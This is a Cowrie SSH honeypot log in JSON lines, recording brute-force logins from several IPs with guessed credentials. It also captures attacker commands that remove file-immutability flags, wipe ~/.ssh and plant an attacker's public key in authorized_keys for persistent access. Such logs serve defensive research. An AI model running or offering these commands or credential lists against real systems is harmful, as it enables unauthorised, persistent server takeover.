{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:33.887320Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:44:34.512084Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:44:34.512823Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:44:34.779144Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:34.780144Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.session.connect","src_ip":"116.193.191.90","src_port":48250,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5b2b63af518","protocol":"ssh","message":"New connection: 116.193.191.90:48250 (1.2.3.4:22) [session: c5b2b63af518]","sensor":"my-vps","timestamp":"2025-09-08T18:44:35.049411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:44:35.050191Z","src_ip":"116.193.191.90","session":"c5b2b63af518"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:44:35.314999Z","src_ip":"116.193.191.90","session":"c5b2b63af518"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:44:36.421168Z","src_ip":"116.193.191.90","session":"c5b2b63af518"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:37.691502Z","src_ip":"116.193.191.90","session":"c5b2b63af518"}
{"eventid":"cowrie.session.connect","src_ip":"116.193.191.90","src_port":48256,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b508c6866b5","protocol":"ssh","message":"New connection: 116.193.191.90:48256 (1.2.3.4:22) [session: 7b508c6866b5]","sensor":"my-vps","timestamp":"2025-09-08T18:44:37.951221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:44:37.952149Z","src_ip":"116.193.191.90","session":"7b508c6866b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:44:38.209953Z","src_ip":"116.193.191.90","session":"7b508c6866b5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:44:39.282182Z","src_ip":"116.193.191.90","session":"7b508c6866b5"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:39.536900Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:39.541440Z","src_ip":"116.193.191.90","session":"7b508c6866b5"}
{"eventid":"cowrie.session.connect","src_ip":"194.5.192.95","src_port":57372,"dst_ip":"1.2.3.4","dst_port":22,"session":"29101d734e33","protocol":"ssh","message":"New connection: 194.5.192.95:57372 (1.2.3.4:22) [session: 29101d734e33]","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.287855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.288665Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.315842Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.login.success","username":"root","password":"Hetzner-As1#","message":"login attempt [root/Hetzner-As1#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.466454Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:44:55.574776Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.575465Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.576612Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.604883Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:44:55.676636Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.677449Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.707410Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.708295Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.session.connect","src_ip":"194.5.192.95","src_port":57380,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1d82ab005ad","protocol":"ssh","message":"New connection: 194.5.192.95:57380 (1.2.3.4:22) [session: e1d82ab005ad]","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.742051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.742999Z","src_ip":"194.5.192.95","session":"e1d82ab005ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.778435Z","src_ip":"194.5.192.95","session":"e1d82ab005ad"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:44:55.960529Z","src_ip":"194.5.192.95","session":"e1d82ab005ad"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:56.998741Z","src_ip":"194.5.192.95","session":"e1d82ab005ad"}
{"eventid":"cowrie.session.connect","src_ip":"194.5.192.95","src_port":57394,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcc8322d6059","protocol":"ssh","message":"New connection: 194.5.192.95:57394 (1.2.3.4:22) [session: bcc8322d6059]","sensor":"my-vps","timestamp":"2025-09-08T18:44:57.035918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:44:57.036487Z","src_ip":"194.5.192.95","session":"bcc8322d6059"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:44:57.073361Z","src_ip":"194.5.192.95","session":"bcc8322d6059"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:44:57.261720Z","src_ip":"194.5.192.95","session":"bcc8322d6059"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:57.299003Z","src_ip":"194.5.192.95","session":"29101d734e33"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:57.300118Z","src_ip":"194.5.192.95","session":"bcc8322d6059"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":47496,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5b4dbd1e327","protocol":"ssh","message":"New connection: 170.64.157.139:47496 (1.2.3.4:22) [session: b5b4dbd1e327]","sensor":"my-vps","timestamp":"2025-09-08T18:45:29.166966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:45:29.167858Z","src_ip":"170.64.157.139","session":"b5b4dbd1e327"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:45:29.456388Z","src_ip":"170.64.157.139","session":"b5b4dbd1e327"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1q2w3e4r","message":"login attempt [postgres/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T18:45:30.324748Z","src_ip":"170.64.157.139","session":"b5b4dbd1e327"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:45:31.616589Z","src_ip":"170.64.157.139","session":"b5b4dbd1e327"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":42680,"dst_ip":"1.2.3.4","dst_port":22,"session":"adcc44abbf1d","protocol":"ssh","message":"New connection: 170.64.157.139:42680 (1.2.3.4:22) [session: adcc44abbf1d]","sensor":"my-vps","timestamp":"2025-09-08T18:46:41.866255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:46:41.867544Z","src_ip":"170.64.157.139","session":"adcc44abbf1d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:46:42.198075Z","src_ip":"170.64.157.139","session":"adcc44abbf1d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"111111","message":"login attempt [postgres/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T18:46:43.180079Z","src_ip":"170.64.157.139","session":"adcc44abbf1d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:46:44.565774Z","src_ip":"170.64.157.139","session":"adcc44abbf1d"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":39456,"dst_ip":"1.2.3.4","dst_port":22,"session":"88ad84cffc3f","protocol":"ssh","message":"New connection: 170.64.157.139:39456 (1.2.3.4:22) [session: 88ad84cffc3f]","sensor":"my-vps","timestamp":"2025-09-08T18:47:55.976647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:47:55.977631Z","src_ip":"170.64.157.139","session":"88ad84cffc3f"}
